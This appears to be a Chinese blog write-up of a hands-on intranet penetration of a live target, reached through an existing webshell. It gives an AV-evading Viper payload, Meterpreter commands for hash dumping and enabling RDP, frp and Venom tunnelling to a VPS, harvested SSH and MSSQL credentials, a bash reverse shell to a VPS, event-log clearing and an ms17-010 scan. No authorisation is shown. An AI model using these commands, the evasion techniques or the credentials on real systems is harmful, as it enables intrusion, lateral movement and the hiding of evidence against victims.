当前位置:网站首页>实战| 记一次借Viper来多重内网渗透
实战| 记一次借Viper来多重内网渗透
2022-06-23 03:52:00 【ECHO::】
实战| 记一次借Viper来多重内网渗透
马上hw,这两天闲的荒,来点实操, --2022/6/21 19:05 ECHO::
上次打攻防漏了很多web端、很多ssh这块和端口转发的内容,,算是个很大的缺口,从我那上百个shell中随机挑个站点,开始一场内网渗透。具体怎么拿的shell,在这里,
https://blog.csdn.net/qq_29437513/article/details/122283851
0x01.Viper上线
viper更新到1.5.22了,通过Callback回调函数生成免杀exe,下载本地,上传目标机

冰蝎执行

目标环境有360,但viper还是上线了

老话题: 怎么绕过的360?怎么上线的?
- 某60,执行命令拦的很,各种白名单拦截,同时还弹窗,最常见的net user,
执行返回拒绝,这种情况360全部功能全开

2.第二种情况,360不全开,比如,用户长时间未登录,锁定,不会全拦
0x02.抓取Hash
上线后,抓取hash,viper自带有hashdump,但需要进程x64,默认上线的进程x86,进行进程迁移,,选择高权限的conhost.exe 2345explor 这些进程,(尽量不选择靠前的系统进程,注入容易重启)

抓到hash,拿去解密,Aa123456,这个内网常用弱口令,mssql和rdp,ssh常用(root admin123)

msf模块,注册表开启3389 post/windows/manage/enable_rdp
reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
execute -H -f cmd.exe -a "/c sc stop termservice"
execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
注册表的端口值

netstat发现已经监听,但端口扫描未发现开启,得出结论,这是内网机器,通过映射到出口ip上,

0x03.端口转发
内网的机子,虽然有webshell,但他是映射到出口ip上,不能正向代理。
可以反向代理,机子能访问外网vps的端口,吧流量转到vps端口上,在vps开个端口转发,本地pc机进行内网访问。
我这里用过的有frp 和Venom
01.frp的代理,常用的是vps监听端口,内网吧3389流量转发给vps
02.Venom的代理,和frp差不多,通常可以配合proxifer流量代理,本地Pc机访问到内网应用。
本地测试 frp
服务端只需要配置bind_port ,这里vps配置22222,

webshell端的frpc.ini配置,转发流量到vps的22222,允许外网通过vps的6000端口访问3389服务

转发成功,

吧解密的管理员密码登录

查看事件管理器,清除事件,很明显看到之前有人反复fuzz登录密码,同时登录没有rdp登录成功通过别的方式比如webshell部分也会记录,进程services.exe tomcat.exe
发现有teamviewer

0x04.内网横向
内网横向有域打域控,没域打内网其他的设备,看能拿多少台服务器,这次测试的目的是内网的服务器,内网的网络设备,摄像头、安全设备、数据库不考虑在内
判断域,不存在域
net time /domain 域控的时间同步
net config workstation 查看主机在内网的角色
横向我用的是端口转发是Venom,这tm就是神器,稳的一批。
内网资产扫描我用的是
https://github.com/1n7erface/RequestTemplate
扫描b端很全,,常见的ssh、redis和web扫描,xray的内核,挂到rdp里面
一些ssh
ssh 10.10.11.113 22 root admin123
ssh 10.10.11.110 22 root admin123
ssh 10.10.11.114 22 root admin123
10.10.30.83 1433 sa Aa123456
Venom内网渗透
1.webshell执行命令 agent.exe rhost rport

2.vps端监听1009,goto 1进行操作,socks代理出来本地PC通过proxifer代理连接

本地PC通过Proxifer设置socks代理

设置代理规则

本地PC-xshell连接内网ssh,

登录成功,查看history,有很明显的开发痕迹,这里不进行后续渗透

nc反弹shell到vps,点到为止,
nc -lvp 6000
bash -i >& /dev/tcp/vpsip/6000 0>&1
反弹成功,拿到shell

到此为止,,走之前清理痕迹,msf批量扫描ms17-010捡个漏
msf添加路由,

有捡漏,但不进行后续渗透

边栏推荐
- E45: ‘readonly‘ option is set (add ! to override)
- Abnova actn4 purified rabbit polyclonal antibody instructions
- An understanding of free() (an error in C Primer Plus)
- Chrome调试技巧
- Kail 渗透基本素养 基础命令
- Abnova blood total nucleic acid purification kit protocol
- 2020:VL-BERT: Pre-training of generic visual-linguistic representation
- Altium designer 09 screen printing displays a green warning near the pad. How to prevent it from alarming?
- Abnova酸性磷酸酶(小麦胚芽)说明书
- Abnova LiquidCell-负富集细胞分离和回收系统
猜你喜欢

Abnova abcb10 (human) recombinant protein specification
Laravel中使用 Editor.md 上传图片如何处理?

Reinstallation of cadence16.3, failure and success

Please use the NLTK Downloader to obtain the resource

Examples of corpus data processing cases (part of speech encoding, part of speech restoration)

Abnova PSMA磁珠解决方案

Abnova酸性磷酸酶(小麦胚芽)说明书

mysql json

laravel 8.4 路由问题,结尾处是编辑器左侧对照表,小白可看懂

Abnova fluorescent dye 555-c3 maleimide scheme
随机推荐
Cocos learning diary 2 - scripts and attributes
Pta:6-71 clock simulation
【论文阅读】Semi-Supervised Learning with Ladder Networks
Flask基础:环境搭建+配置+URL与试图之间的映射+重定向+数据库连接
静态双位置继电器GLS-3004K/DC220V
notepad++ 查找替换之分组替换保留
mysql json
Three operation directions of integral mall
Common concepts and terms in offline warehouse modeling
AD9使用技巧拾遗
Const understanding one
Chrome调试技巧
Altium designer 09 screen printing displays a green warning near the pad. How to prevent it from alarming?
Dpr-34v/v two position relay
1183. 电力
电流继电器JDL-1002A
Pta:7-31 journal charges
[acnoi2022] no way without guessing
cadence中的焊盘和flash symbol
OpenJudge NOI 1.13 50:数根